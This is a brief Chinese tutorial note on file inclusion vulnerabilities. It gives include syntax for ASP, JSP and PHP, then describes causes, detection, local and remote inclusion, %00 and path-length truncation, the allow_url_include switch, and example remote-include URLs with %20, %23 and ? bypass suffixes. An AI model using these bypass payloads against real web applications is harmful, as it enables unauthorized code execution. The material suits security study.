文件包含示例代码
<!---#include file=" 1.asp" -->
<! --#include file="top. aspx" -->
<c : import url="http : / /thief.one/1.jsp">
<jsp:include page=" head .jsp" / >
<%@include file="head.jsp"%>
<?php Include ( 'test.php ' ) ?>
文件包含漏洞的原理,检测,类型,利用,修复等
原理:将指定文件的内容按照代码的格式进行执行
成因:可控制的变量,函数的执行
检测:白盒和黑盒检测,白盒可以使用代码审计,黑盒可以使用漏扫,公开漏洞,手工看参数值以及功能点
类型:包含本地包含和远程包含两种。远程包含的危害更大一些。
利用:根据不同的协议利用不同
本地包含的有限制和无限制
无限制就是随便包含,有限制就是可能在文件包含的时候必须要满足指定的格式,面对这种情况,可以采用%00截断或者长度截断。长度节点windows中点号要长于256,linux要长于4096
远程包含的有限制和无限制
在php中远程包含存在开关,allow_url_include
有限制和无限制是与本地包含类似的
有限制的绕过可以采用%20 %23 ?等断开
http:/ /127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%20
http:/ /127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%23
http:/ /127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt ?
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
